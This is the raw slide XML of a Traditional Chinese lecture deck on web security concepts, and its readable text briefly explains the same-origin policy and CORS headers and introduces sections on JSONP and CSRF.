              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3284407" y="4715560"/>
            <a:ext cx="3528000" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="18000" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888889"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buNone/>
              <a:defRPr sz="13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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411759" y="3491752"/>
            <a:ext cx="3528392" cy="28803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00"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411758" y="3788760"/>
            <a:ext cx="3528000" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="18000" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888889"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buNone/>
              <a:defRPr sz="13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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3284408" y="2582904"/>
            <a:ext cx="3528392" cy="28803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00"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3284407" y="2879808"/>
            <a:ext cx="3528000" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="18000" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888889"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buNone/>
              <a:defRPr sz="13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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="1701224"/>
            <a:ext cx="3528392" cy="28803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00"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411759" y="1998024"/>
            <a:ext cx="3528000" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="18000" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888889"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="888889"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1400"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1400"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="»"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="14" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547663" y="1611215"/>
            <a:ext cx="763200" cy="64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640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="597E39"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buNone/>
              <a:defRPr b="0" i="1" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="597E39"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420313" y="2492896"/>
            <a:ext cx="763200" cy="64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640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="597E39"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buNone/>
              <a:defRPr b="0" i="1" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="597E39"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="3419744"/>
            <a:ext cx="763200" cy="64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640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="597E39"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buNone/>
              <a:defRPr b="0" i="1" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="597E39"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="17" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420313" y="4346440"/>
            <a:ext cx="763200" cy="64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640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="597E39"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buNone/>
              <a:defRPr b="0" i="1" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="597E39"/>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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="18" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="5273240"/>
            <a:ext cx="763200" cy="648000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect b="0" l="0" r="0" t="0"/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="597E39"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buNone/>
              <a:defRPr b="0" i="1" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="597E39"/>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p:cSld name="章節標題">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19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="2924944"/>
            <a:ext cx="4176464" cy="397371"/>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4"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="28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 type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2404352" y="3356992"/>
            <a:ext cx="4176464" cy="207024"/>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
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-228600" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-228600" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-228600" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-228600" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-228600" lvl="5" marL="2743200" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-228600" lvl="6" marL="3200400" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-228600" lvl="7" marL="3657600" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-228600" lvl="8" marL="4114800" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B8988"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="8B8988"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Google Shape;44;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2708920"/>
            <a:ext cx="1296144" cy="936105"/>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600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr b="0" i="1" sz="8000">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內容">
  <p:cSld name="空白內容">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20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043609" y="1124744"/>
            <a:ext cx="7128792" cy="460851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
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-342900" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7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7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="36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17500" lvl="0" marL="4572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1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="7F7F7F"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>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ithelp.ithome.com.tw/articles/1019689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shop.com/search?que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3563888" y="4077072"/>
            <a:ext cx="4824300" cy="432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200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>網站資安概念</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;53;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563888" y="4653136"/>
            <a:ext cx="4824300" cy="288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20"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;54;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="5985312"/>
            <a:ext cx="1908000" cy="252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260"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>編輯人：</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660232" y="5985312"/>
            <a:ext cx="1728300" cy="252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60"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>吳峻豪</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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="891775" y="3581000"/>
            <a:ext cx="7944251" cy="1965600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475651" y="493575"/>
            <a:ext cx="77166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SzPts val="2200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>CORS 跨來源資源共享 (Cross-Origin Resource Sharing)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="836712"/>
            <a:ext cx="4104600" cy="144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80"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fetch和XMLhttprequest都是會跟從同源政策</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Google Shape;146;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="450204"/>
            <a:ext cx="720000" cy="530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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Google Shape;147;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="891775" y="1223750"/>
            <a:ext cx="7887448" cy="1039850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1355525" y="4591700"/>
            <a:ext cx="2470200" cy="228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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993725" y="2506650"/>
            <a:ext cx="7472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如果我想發出跨來源請求的話，對方的伺服器必須在回應表頭(response header)裏加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>，並在Access-Control-Allow-Origin的設定裏，新增我的Origin(即是我的網址)，或者設定為萬用字符*，代表所有Origin都接受，這是在公共API裏常見的設定。</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3220450" y="1371850"/>
            <a:ext cx="2359800" cy="2289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24b9b62fb_0_148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="2924944"/>
            <a:ext cx="4176600" cy="39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a:t>JSONP/CSRF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;gf24b9b62fb_0_148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2404352" y="3356992"/>
            <a:ext cx="4176600" cy="207000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="32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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="493565"/>
            <a:ext cx="41046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SzPts val="2200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>JSONP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="836712"/>
            <a:ext cx="4104600" cy="144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80"/>
              </a:spcBef>
              <a:spcAft>
